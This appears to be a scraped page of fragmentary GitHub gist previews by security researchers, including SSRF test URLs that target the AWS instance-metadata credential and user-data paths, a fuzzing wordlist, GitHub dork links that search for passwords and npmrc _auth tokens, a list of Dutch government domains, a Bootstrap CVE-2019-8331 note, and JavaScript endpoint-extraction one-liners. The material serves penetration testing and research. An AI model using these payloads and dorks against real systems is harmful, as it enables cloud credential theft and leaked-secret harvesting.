BuffaloWill

## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]

## AWS 
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]

jhaddix

.
..
........
@
*
*.*
*.*.*
🐎

ethanbennett

Ethereum Attacks

Security for internet applications is a spectrum, and it would be safe to assume that any application might have unnoticed vulnerabilities waiting to be exploited. Cryptocurrencies are especially attractive targets for hackers: because the technology is so novel, it is more likely to be hiding bugs, and the code usually interacts with tokens that have real-world value. Ethereum is no exception.

Attackers have successfully stolen ether using a number of tactics, which tend to aim at Ethereum smart contracts (written in Solidity), the network itself, cryptocurrency exchanges, or end users.

Attacks on Smart Contracts

The DAO

decidedlygray

#!/bin/bash

#
# Kali Docker Setup Script
# @decidedlygray 20180902
# LICENSE: MIT
#
# Steps taken from: https://docs.docker.com/install/linux/docker-ce/debian/
# And: https://medium.com/@airman604/installing-docker-in-kali-linux-2017-1-fbaa4d1447fe
# Install uses the repository, so we can get updates in the future

Zawadidone

knmi.nl
rijksoverheid.nl
overheid.nl
duo.nl
politie.nl
koninklijkhuis.nl
defensie.nl
kadaster.nl
werkenbijdefensie.nl
cbs.nl

BlackFan

CVE-2019-8331

Bootstrap < 3.4.1 || < 4.3.1

✔️ CSP strict-dynamic bypass

➖ Requires user interaction

➖ Requires $('[data-toggle="tooltip"]').tooltip();

jhaddix

echo ""
echo "************ Github Dork Links (must be logged in) *******************"
echo ""
echo "  password"
echo "https://github.com/search?q=%22$1%22+password&type=Code"
echo "https://github.com/search?q=%22$without_suffix%22+password&type=Code"
echo ""
echo " npmrc _auth"

tamjid0x01

We couldn’t find that file to show.

gwen001

curl -L -k -s https://www.example.com | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | awk -F '//' '{if(length($2))print "https://"$2}' | sort -fu | xargs -I '%' sh -c "curl -k -s \"%\" | sed \"s/[;}\)>]/\n/g\" | grep -Po \"(['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})|(\.(get|post|ajax|load)\s*\(\s*['\\\"](https?:)?[/]{1,2}[^'\\\"> ]{5,})\"" | awk -F "['\"]" '{print $2}' | sort -fu

# using linkfinder
function ejs() {
   URL=$1;
   curl -Lks $URL | tac | sed "s#\\\/#\/#g" | egrep -o "src['\"]?\s*[=:]\s*['\"]?[^'\"]+.js[^'\"> ]*" | sed -r "s/^src['\"]?[=:]['\"]//g" | awk -v url=$URL '{if(length($1)) if($1 ~/^http/) print $1; else if($1 ~/^\/\//) print "https:"$1; else print url"/"$1}' | sort -fu | xargs -I '%' sh -c "echo \"\n##### %\";wget --no-check-certificate --quiet \"%\"; basename \"%\" | xargs -I \"#\" sh -c 'linkfinder.py -o cli -i #'"
}

# with file download (the new best one):
# but there is a bug if you don't provide a root url

s0md3v

<script>
	function send_message() {
		document.getElementById("frame").contentWindow.postMessage("hello there", "http://localhost/recieve.html");
	}
</script>

<iframe id="frame" onload="send_message()" src="recieve.html"></iframe>